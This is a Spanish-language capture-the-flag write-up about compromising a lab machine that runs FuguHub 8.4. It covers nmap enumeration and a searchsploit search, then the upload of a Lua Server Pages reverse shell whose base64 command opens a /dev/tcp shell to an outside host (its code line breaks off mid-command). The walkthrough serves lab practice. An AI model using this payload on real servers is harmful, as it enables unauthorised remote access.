MAQUINA HUB ( Enum web port 8082 + FUGUHUB + injeccion revershell en LUA)

Realice un escaneo con nmap para verificar los puertos abiertos.

nmap -p- --open --min-rate 4000 -sS -vvv -n -Pn 192.168.240.25 -oN basicscan.txt

Luego realice otro escaneo con nmap que utiliza script de reconocimientos básicos.

nmap -p22,80,8082,9999 -sCV 192.168.240.25

El puerto 8082 me dirige a una pagina web llamada FUGUHUB

Reviso el puerto 9999 y me envié también a esta web, pero esta web esta certificada.

Encontré un panel de sesión.

Revise la sección "about" y encontré la versión del software.

Busque si existe un exploit para esta versión de fuguhub 8.4 en searchsploit.

searchsploit fuguhub

Encontré un RCE pero para la versión antigua 8.1. Luego pase a buscar alguna exploit en Google.

Al parecer puedo realizar ejecución remota de comandos autenticado.

Para ellos en la sección de login me creo una cuenta, al crear la cuenta me da permisos de administrador.

En la sección de web-file-server > fs puedo subir archivos tanto txt. como otros.

Revise la web y también se permite subir archivos en LUA.

Donde se suben los archivos subi una revershell escrito en LUA.

lisp
<div style="margin-left:auto;margin-right: auto;width: 350px;">
<div id="info">
<h2>Lua Server Pages Reverse Shell</h2>
<p>Delightful, isn't it?</p>
</div>
<?lsp if request:method() == "GET" then ?>
<?lsp os.execute("echo c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xLjc1LzEyMzQgMD4mMQo= |
<?lsp else ?>
You sent a <?lsp=request:method()?> request
<?lsp end ?>
</div>

Primero codifique mi revershell en base64 y luego reempleaze la que esta en el script.

Me dirige a la carpeta web-file-server > fs y en la subí mi revershell.lsp

Me puse a la escucha con netcat y coloque el nombre de la revershell en la URL. Una vez que envie la petecion me devolvio la revershell.